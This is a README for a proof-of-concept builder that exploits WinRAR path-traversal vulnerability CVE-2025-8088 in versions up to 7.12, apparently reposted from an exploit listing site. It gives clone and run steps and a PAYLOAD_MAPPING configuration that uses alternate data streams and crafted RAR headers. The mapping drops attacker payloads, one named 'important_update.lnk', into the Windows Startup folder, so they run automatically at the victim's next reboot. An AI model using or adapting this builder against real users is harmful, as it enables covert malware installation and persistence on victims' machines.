Share
## https://sploitus.com/exploit?id=357A41A7-9B97-5545-A8DA-84693362BC9C
# CVE-2025-8088-WinRAR-builder
A POC exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower
## ๐ How It Works
1. Creates a Rar embed with other payloads
2. Using Multiple ADS Streams ๐ - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers โ๏ธ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup ๐ - Attempts to write payload to Windows startup folder when extracted
## ๐ ๏ธ Usage
1. Clone the repository
```bash
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
```
2. Prepare payloads
```
mkdir payloads
```
- Add our payloads to that folder (exe, dll, lnk, ...)
- Modify `PAYLOAD_MAPPING` in the script
```python
# 2. Map our payload to corresponding destination
# Format: (filename_in_payloads_dir, target_extract_dest)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
# Payload 1
("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),
# Payload 2
("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),
# Payload 3
# Add your own
]
```
3. Run the exploit
```
python builder.py
```
## ๐ Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (โค7.12)
2. Payload gets written to destination folder, e.g. :
```bash
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
```
3. On next reboot โก๏ธ payload executes automatically
## ๐ Requirements
- Windows OS ๐ช
- Python 3.x ๐
- WinRAR installed